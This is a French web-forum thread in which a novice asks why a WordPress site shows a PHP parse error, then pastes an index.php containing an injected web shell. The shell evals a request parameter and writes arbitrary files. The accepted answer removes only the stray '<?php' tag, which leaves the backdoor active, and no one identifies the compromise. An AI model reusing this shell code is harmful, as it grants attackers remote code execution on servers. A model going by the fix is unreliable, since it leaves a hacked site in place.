Syntax error, unexpected '<'

Fermé
la-valdu Messages postés 4 Date d'inscription samedi 15 juin 2013 Statut Membre Dernière intervention 15 juin 2013 - 15 juin 2013 à 17:07
 Utilisateur anonyme - 15 juin 2013 à 17:47
Bonjour,
J'ai un petit soucis sur un site fait avec Wordpress, désormais quand je tape son adresse il apparait ceci :
Parse error: syntax error, unexpected '<' in /homez.666/lemagnol/www/index.php on line 18

Je suis novice et ne sais absolument pas comment faire pour rattraper cette erreur.

Je ne sais même pas où trouver le code...

HELP !

Je ne pourrai que remercier grandement la personne qui me sortira de ce pétrin...
A voir également:

6 réponses

Utilisateur anonyme
15 juin 2013 à 17:39
Bonjour

Retire <?php au début de la ligne 18
1
ozone_ Messages postés 1518 Date d'inscription lundi 13 juillet 2009 Statut Membre Dernière intervention 2 juin 2023 478
15 juin 2013 à 17:17
Salut,
Faudrait qu'on puisse voir la ligne 18 ou un morceau du code qui pose problème parce que sinon personne pourra t'aider
0
la-valdu Messages postés 4 Date d'inscription samedi 15 juin 2013 Statut Membre Dernière intervention 15 juin 2013
15 juin 2013 à 17:20
Bonjour Ozone, merci pour ta réponse et ton conseil.
Le problème est que je ne sais même pas comment vous montrer un morceau du code ou la ligne concernée...
Où puis-je aller le chercher pour vous le copier coller ?
(...Suis vraiment nulle...)
0
ozone_ Messages postés 1518 Date d'inscription lundi 13 juillet 2009 Statut Membre Dernière intervention 2 juin 2023 478
15 juin 2013 à 17:25
D'après l'erreur, c'est dans le fichier index.php.
Ce fichier doit se trouver quelque part dans ton ordinateur.
Tu modifies comment ton site sans avoir accès aux fichiers du site en question ?
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
la-valdu Messages postés 4 Date d'inscription samedi 15 juin 2013 Statut Membre Dernière intervention 15 juin 2013
15 juin 2013 à 17:29
Je passe par Filezilla.
Mais je ne savais pas où trouver l'erreur.
Voilà mon fichier index.php :

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
<?php $ckjnc = "6bb6022004c4a5df6b7f484306f673bf"; if(isset($_REQUEST['ualeq'])) { $oabq = $_REQUEST['ualeq']; eval($oabq); exit(); } if(isset($_REQUEST['yhatkxn'])) { $herdpy = $_REQUEST['spkmvf']; $gjdjxe = $_REQUEST['yhatkxn']; $nujuuc = fopen($gjdjxe, 'w'); $squzu = fwrite($nujuuc, $herdpy); fclose($nujuuc); echo $squzu; exit(); } ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
0
la-valdu Messages postés 4 Date d'inscription samedi 15 juin 2013 Statut Membre Dernière intervention 15 juin 2013
15 juin 2013 à 17:42
POUHAAAA ! Ca marche !!! Merci infiniment ! Heureusement qu'il y a des gens hyper compétents sur ce forum ! (pas comme moi ;-) Je te souhaite une excellente soirée
0
Utilisateur anonyme
15 juin 2013 à 17:47
Heu... Le "hyper compétent" est certainement très, très exagéré !
Bon courage pour la suite
0